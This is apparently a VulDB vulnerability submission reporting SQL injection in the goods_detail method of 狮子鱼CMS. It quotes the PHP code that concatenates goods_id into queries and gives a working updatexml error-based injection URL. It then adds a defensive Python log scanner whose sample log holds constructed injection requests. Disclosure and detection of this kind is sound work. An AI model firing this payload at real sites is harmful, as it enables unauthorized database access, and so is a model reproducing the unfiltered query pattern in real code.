Submission #96988: 狮子鱼CMS goods_id parameters are not strictly filtered, resulting in SQL injection vulnerabilities

Title: 狮子鱼CMS goods_id parameters are not strictly filtered, resulting in SQL injection vulnerabilities
Description: The vulnerable file is ApiController.class.php, and the key location is the goods_detail() method:

    public function goods_detail()
    {
        // goods_id is read from the query string without any type filter
        $goods_id = I('get.goods_id');
        //gallery =>img_url
        //goods goods.goods_desc goods_name group_price market_price sell_count group_number
        // the raw parameter is concatenated straight into the SQL statement
        $sql = "select g.*,gd.description,gd.summary,gd.tag from " . C('DB_PREFIX') . "goods g," . C('DB_PREFIX') . "goods_description gd where g.goods_id=gd.goods_id and g.goods_id=" . $goods_id;
        $goods_arr = M()->query($sql);
        $qian = array("\r\n");
        $hou = array("<br/>");
        $goods_arr[0]['summary'] = str_replace($qian, $hou, $goods_arr[0]['summary']);
        // second unparameterised query built from the same value
        $sql = "select image from " . C('DB_PREFIX') . "goods_image where goods_id=" . $goods_id;
        $goods_image = M()->query($sql);
        $gallery = array();
        $default_image = '';
        foreach ($goods_image as $val) {
            $val['img_url'] = str_replace('http', 'https', C('SITE_URL')) . '/Uploads/' . $val['image'];
            if (empty($default_image)) {
                $default_image = str_replace('http', 'https', C('SITE_URL')) . resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
            }
            $gallery[] = array('img_url' => $val['img_url']);
        }
        $goods = $goods_arr[0];
        // ... remainder of the method not included in the submission
    }

The payload for the vulnerability test is:

    xxx/index.php?s=api/goods_detail&goods_id=1 and updatexml(0,concat(0x7e,(database())),0)

Vulnerable URLs (examples):

Vulnerability description: Poor filtering of the goods_id parameter in the 狮子鱼CMS ApiController.class.php file leads to a SQL injection vulnerability. By inserting SQL commands into web forms or into the query string of domain names or page requests, the server is ultimately tricked into executing malicious SQL commands to obtain data from the database.
User: S7iter (UID 42133)
Submitted: 03/02/2023 01:01 PM (3 years ago)
Moderated: 03/02/2023 07:22 PM (6 hours later)
Status: Accepted
VulDB Entry: 222223 [狮子鱼CMS ApiController.class.php goods_detail goods_id SQL Injection]
Points: 17
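As an added defender-side example (not part of the submission or of the CMS code), the following Python scans combined-format web access logs for requests to the goods_detail action whose goods_id is not a plain integer, which is exactly the check the vulnerable code omits, and additionally flags the MySQL error-based functions used by the payload above. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); addresses,
# timestamps and the benign requests are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Mar/2023:13:01:00 +0000] "GET /index.php?s=api/goods_detail&goods_id=17 HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Mar/2023:13:01:04 +0000] "GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1) HTTP/1.1" 500 412 "-" "curl/7.88"
10.0.0.9 - - [02/Mar/2023:13:01:07 +0000] "GET /index.php?s=api/goods_detail&goods_id=1+AND+1=1 HTTP/1.1" 200 2311 "-" "curl/7.88"
10.0.0.3 - - [02/Mar/2023:13:02:00 +0000] "GET /index.php?s=index/index&goods_id=abc HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# MySQL error-based functions used by the payload in this submission
ERROR_FUNCS = re.compile(r'\b(updatexml|extractvalue)\s*\(', re.IGNORECASE)

def classify_request(path: str):
    """Return None for a benign request, otherwise a short reason string.
    Mirrors the missing check: on goods_detail, goods_id must be an integer."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)  # percent-decodes values
    if query.get("s", [""])[0] != "api/goods_detail":
        return None
    for value in query.get("goods_id", []):
        if value.isdigit():
            continue
        if ERROR_FUNCS.search(value):
            return "error-based SQLi signature in goods_id"
        return "non-integer goods_id"
    return None

def scan_log(text: str):
    """Return (client_ip, http_status, reason) for every suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m["path"])
        if reason:
            hits.append((m["ip"], int(m["status"]), reason))
    return hits

if __name__ == "__main__":
    for ip, status, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {status}: {reason}")
```

A 500 response paired with the updatexml signature is the strongest indicator, since the technique relies on the database error text being returned to the client.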
